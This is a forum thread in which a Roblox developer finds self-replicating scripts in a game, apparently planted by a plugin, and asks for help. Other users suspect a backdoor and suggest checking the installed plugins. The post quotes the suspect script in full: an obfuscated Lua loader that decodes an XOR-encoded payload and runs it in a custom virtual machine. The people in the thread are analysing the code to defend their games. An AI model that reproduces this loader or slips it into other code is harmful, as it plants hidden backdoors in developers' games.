What does this script do?

In my roblox game I found some random scripts cloning themselves, and parenting themselves into random Items in my game (It seems to parent / target a laptop model that I made :thinking: I wonder why), including giving itself wierd names such as *, Illuminati symbol, pyramid, nil, arrow, F, etc…

I don’t remember putting those scripts in there :thinking:!

I wonder if it is a backdoor / game hijacker. Here is a link to the model:

Could someone tell me what in the world that script does?!

Well, could you send some of the scripts? (I don’t want to download the model.)
Most of these types just lag the game or give some permissions to the owners (backdoors) your game.
It may be from your plugins or something like that, make sure to check your plugins.


Here is the script:

local i=string.byte;local d=string.char;local c=string.sub;local u=table.concat;local L=getfenv or function()return _ENV end;local l=setmetatable;local s=select;local h=unpack;local r=tonumber;local function m(i)local e,n,a="","",{}local o=256;local t={}for l=0,o-1 do t[l]=d(l)end;local l=1;local function f()local e=r(c(i,l,l),36)l=l+1;local n=r(c(i,l,l+e-1),36)l=l+e;return n end;e=d(f())a[1]=e;while l<#i do local l=f()if t[l]then n=t[l]else n=e..c(e,1,1)end;t[o]=e..c(n,1,1)a[#a+1],e,o=n,n,o+1 end;return table.concat(a)end;local t=m('24327427424927526N24B22R23021F24B27427927B21I27E24326J23V27H23V27426M23N24Z24321I23N27F23N27H27V24326N27X23027U27426J24Z27H27S24327Q27S28428A24B27V27I27P27J28H24324727524124427526926U26A26E26Y28R24124127525D26U24027422B25221Y21423F25U29224323725U23A29725U243');local o=bit and bit.bxor or function(l,n)local e,o=1,0 while l>0 and n>0 do local a,c=l%2,n%2 if a~=c then o=o+e end l,n,e=(l-a)/2,(n-c)/2,e*2 end if l<n then l=n end while l>0 do local n=l%2 if n>0 then o=o+e end l,e=(l-n)/2,e*2 end return o end local function e(e,l,n)if n then local l=(e/2^(l-1))%2^((n-1)-(l-1)+1);return l-l%1;else local l=2^(l-1);return(e%(l+l)>=l)and 1 or 0;end;end;local l=1;local function n()local c,n,e,a=i(t,l,l+3);c=o(c,147)n=o(n,147)e=o(e,147)a=o(a,147)l=l+4;return(a*16777216)+(e*65536)+(n*256)+c;end;local function a()local e=o(i(t,l,l),147);l=l+1;return e;end;local function m()local l=n();local o=n();local c=1;local n=(e(o,1,20)*(2^32))+l;local l=e(o,21,31);local e=((-1)^e(o,32));if(l==0)then if(n==0)then return e*0;else l=1;c=0;end;elseif(l==2047)then return(n==0)and(e*(1/0))or(e*(0/0));end;return e*(2^(l-1023))*(c+(n/(2^52)));end;local r=n;local function f(e)local n;if(not e)then e=r();if(e==0)then return'';end;end;n=c(t,l,l+e-1);l=l+e;local e={}for l=1,#n do e[l]=d(o(i(c(n,l,l)),147))end return u(e);end;local l=n;local function u()local i={0,0,0,0,0,0,0,0,0,0};local l={};local c={};local t={i,nil,l,nil,nil,nil,c};t[5]=a();for e=1,n()do l[e-1]=u();end;for a=1,n()do local c=o(n(),125);local n=o(n(),165);local o=e(c,1,2);local l=e(n,1,11);local l={l,e(c,3,11),nil,nil,n};if(o==0)then l[3]=e(c,12,20);l[5]=e(c,21,29);elseif(o==1)then l[3]=e(n,12,33);elseif(o==2)then l[3]=e(n,12,32)-1048575;elseif(o==3)then l[3]=e(n,12,32)-1048575;l[5]=e(c,21,29);end;i[a]=l;end;local l=n()local n={0,0,0,0};for o=1,l do local e=a();local l;if(e==1)then l=(a()~=0);elseif(e==3)then l=m();elseif(e==2)then l=f();end;n[o]=l;end;t[2]=n t[6]=a();return t;end;local function m(l,e,f)local d=l[1];local i=l[2];local e=l[3];local e=l[6];return function(...)local n=1;local c=-1;local a={};local r={...};local l=s('#',...)-1;local o={};local o={nil,nil};for l=0,l do if(l>=e)then a[l-e]=r[l+1];else o[l]=r[l+1];end;end;local l;local t;while true do l=d[n];t=l[1];if t<=5 then if t<=2 then if t<=0 then do return end;elseif t>1 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t<=3 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>4 then f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};local a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;local t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];f[i[l[3]]]=o[l[2]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];n=n+1;l=d[n];e=l[2];if e>c then c=e end;o[e]=i[l[3]];n=n+1;l=d[n];e=l[2];r={};a=0;Limit=e+l[3]-1;for l=e+1,Limit do a=a+1;r[a]=o[l];end;t={o[e](h(r,1,Limit-e))};Limit=e+l[5]-2;a=0;for l=e,Limit do a=a+1;o[l]=t[a];end;c=Limit;n=n+1;l=d[n];e=l[2];o[e]();c=e-1;n=n+1;l=d[n];do return end;else do return end;end;elseif t<=8 then if t<=6 then local e=l[2];if e>c then c=e end;o[e]=f[i[l[3]]];elseif t>7 then local l=l[2];o[l]();c=l-1;else local l=l[2];o[l]();c=l-1;end;elseif t<=10 then if t>9 then local n=l[2];local a={};local e=0;local t=n+l[3]-1;for l=n+1,t do e=e+1;a[e]=o[l];end;local a={o[n](h(a,1,t-n))};local l=n+l[5]-2;e=0;for l=n,l do e=e+1;o[l]=a[e];end;c=l;else local e=l[2];if e>c then c=e end;o[e]=i[l[3]];end;elseif t==11 then f[i[l[3]]]=o[l[2]];else f[i[l[3]]]=o[l[2]];end;n=n+1;end;end;end;return m(u(),{},L())();

Yes like @sebi210 said, this is most likely a backdoor or lagger. You can use an Anti-Virus plugin to check if its in one of your models during studio mode. If you don’t find anything then I would recommend also going through your plugins (like @sebi210 said) or using the backdoor checker from #learning-resources.

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I used Khronos, serverdefender, etc… and I could not find a backdoor

I did install a plug-in recently, so I will probably uninstall it.

Have you checked if you have any suspicious plugins?

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I have 3D-Text Maker to make text and put it on buildings. I installed it recently, so It might be the culprit.

Is that the plugin from #learning-resources? I would find it weird if someone placed a backdoor in that…

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It is this one that I am talking about:


What other plugins do you have installed?

Also I uninstalled 3D-Text maker and it still appears in the plug-in toolbar :thinking: wth.

That’s because you need to restart your studio.
Can you click your plugins folder to show us what you have?

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Thats all I have, I don’t have a huge arsenal of plugins.

I just restarted studio, and It still appears… WUT.

What I mean, is that I can’t really tell what you have from just that.
Its easier to see when you open the manage plugins window.

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@GreekForge wants to check who are the plugin owners.

I was affected by this too.

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Here they are:

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Remove 3rd plugin